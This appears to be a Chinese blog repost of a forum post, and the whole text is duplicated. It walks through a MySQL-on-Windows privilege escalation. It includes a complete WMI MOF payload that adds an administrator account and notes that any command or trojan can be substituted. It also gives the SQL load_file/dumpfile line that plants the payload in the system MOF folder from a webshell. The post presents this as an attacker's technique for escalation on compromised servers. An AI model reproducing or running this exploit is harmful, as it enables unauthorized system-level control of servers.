About Mysql 的那个提权漏洞
2014-06-05 15:19
369 查看
from:http://zone.wooyun.org/content/1795
这个:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
http://www.exploit-db.com/exploits/23083/
大致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。
大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用:
1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullevt.mof文件里(也就是他源码里的payload):
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
注意上面的net.exe user admin admin /add,可以随便改的,想执行啥都行,有没有参数也都行,执行自己的马也行。
再然后,在菜刀里连接mysql数据库后执行:
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
![](http://g.hiphotos.baidu.com/album/pic/item/64380cd7912397dd3f2360ed5982b2b7d1a28785.jpg)
再然后。。你会发现用户添加上去了。
注:测试环境为windows 2003 + mysql 5.0.45-community-nt
win7旗舰版 sp1 + mysql-5.5.28 测试失败,2008未测试。
不过那个利用ADS新建\lib\plugin目录的bug还在,还可以利用那个去导udf提权的。
这个:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
http://www.exploit-db.com/exploits/23083/
大致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。
大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用:
1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullevt.mof文件里(也就是他源码里的payload):
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
注意上面的net.exe user admin admin /add,可以随便改的,想执行啥都行,有没有参数也都行,执行自己的马也行。
再然后,在菜刀里连接mysql数据库后执行:
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
![](http://g.hiphotos.baidu.com/album/pic/item/64380cd7912397dd3f2360ed5982b2b7d1a28785.jpg)
再然后。。你会发现用户添加上去了。
注:测试环境为windows 2003 + mysql 5.0.45-community-nt
win7旗舰版 sp1 + mysql-5.5.28 测试失败,2008未测试。
不过那个利用ADS新建\lib\plugin目录的bug还在,还可以利用那个去导udf提权的。
相关文章推荐
- 新装的操作系统.给金山一扫描,才知道漏洞太多了,还没装好masql呢,估计装了那个还很多
- Tips: How to resolve the issue of MySQL about abnormal login after system launched.
- Linux爆本地提权漏洞 请立即更新udev程序[转]
- MySQL和SQL字段截短漏洞
- MySQL提权简单方法
- MySQL 5.0.91以及 2010年十大数据库漏洞
- Linux的udev 提权漏洞
- [zz]MySQL提权简单方法
- notes about crosstool,uboot,mysql and some tools in linux(ubuntu)
- two articles about MySQL - LEFT JOIN and RIGHT JOIN, INNER JOIN and OUTER JOIN
- PHP与MySQL 中的SQL注入式漏洞
- MySQL关系数据库系统IF查询处理远程拒绝服务漏洞
- mysql udf.dll(UDF)漏洞修补
- MySQL3.23.31之前版本的安全漏洞
- 提权,以MySQL之名
- 关于mysql 字段的那个点为是定界符
- 熊猫卫士2008本地提权漏洞
- Linux爆本地提权漏洞 请立即更新udev程序
- mysql提权
- 数据库的索引,mysql中的索引|||如何在mysql中对text字段加索引?|||mysql数据库中的字段在什么情况下加索引?|||高手请进:text字段不能做索引,有无其他方法?|||该建那个字段